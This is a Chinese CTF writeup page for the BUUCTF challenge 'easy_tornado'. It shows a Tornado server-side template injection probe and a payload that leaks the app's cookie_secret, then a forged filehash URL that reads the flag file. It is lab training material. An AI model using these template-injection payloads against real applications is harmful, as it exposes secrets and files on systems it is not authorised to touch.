👹
CTF Writeup
  • README
  • BUUCTF
    • [护网杯 2018]easy_tornado
    • [极客大挑战 2019]BuyFlag
    • [极客大挑战 2019]BabySQL
    • [ZJCTF 2019]NiZhuanSiWei
    • [BJDCTF2020]Easy MD5
    • [极客大挑战 2019]EasySQL
    • [HCTF 2018]admin
    • [极客大挑战 2019]Havefun
    • [极客大挑战 2019]Http
    • [极客大挑战 2019]HardSQL
    • [极客大挑战 2019]Knife
    • [SUCTF 2019]CheckIn
    • [极客大挑战 2019]LoveSQL
    • [极客大挑战 2019]PHP
    • [极客大挑战 2019]Secret File
    • [MRCTF2020]你传你🐎呢
    • [极客大挑战 2019]Upload
    • [网鼎杯 2020 青龙组]AreUSerialz
    • [极客大挑战 2020]Roamphp6-flagshop
    • [强网杯 2019]随便注
    • [ACTF2020 新生赛]BackupFile
    • [ACTF2020 新生赛]Exec
    • [MRCTF2020]Ez_bypass
    • [ACTF2020 新生赛]Include
    • [GXYCTF2019]Ping Ping Ping
    • [GXYCTF2019]BabySQli
    • [HCTF 2018]WarmUp
    • [RoarCTF 2019]Easy Calc
    • [GYCTF2020]Blacklist
    • [SUCTF 2019]EasySQL
    • [CISCN2019 华北赛区 Day2 Web1]Hack World
    • [网鼎杯 2018]Fakebook
  • RACTF
    • notrequired
    • madlib
    • git commit -m whatever
  • ByteCTF2021
    • double sqli
由 GitBook 提供支持
在本页
  • 一、Hints
  • 二、寻找突破点
  • 三、获取配置信息
  • 四、Get flag

这有帮助吗?

  1. BUUCTF

[护网杯 2018]easy_tornado

一、Hints

md5(cookie_secret+md5(filename))

猜测:需要先获取cookie_secret然后进行文件包含读取flag

二、寻找突破点

发现存在SSTI注入:/error?msg=Error{{ 2 }}

三、获取配置信息

/error?msg=ERR{{ handler.settings }}

得到

{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '845cffd2-9954-45ad-8984-ab83ed9b325a'}

四、Get flag

通过 cookie_secret 生成 filehash,读取 flag

Payload:

/file?filename=/fllllllllllllag&filehash=cac2fcdeb62b85584b49474f9a4f0c6b
上一页BUUCTF下一页[极客大挑战 2019]BuyFlag

最后更新于3年前

这有帮助吗?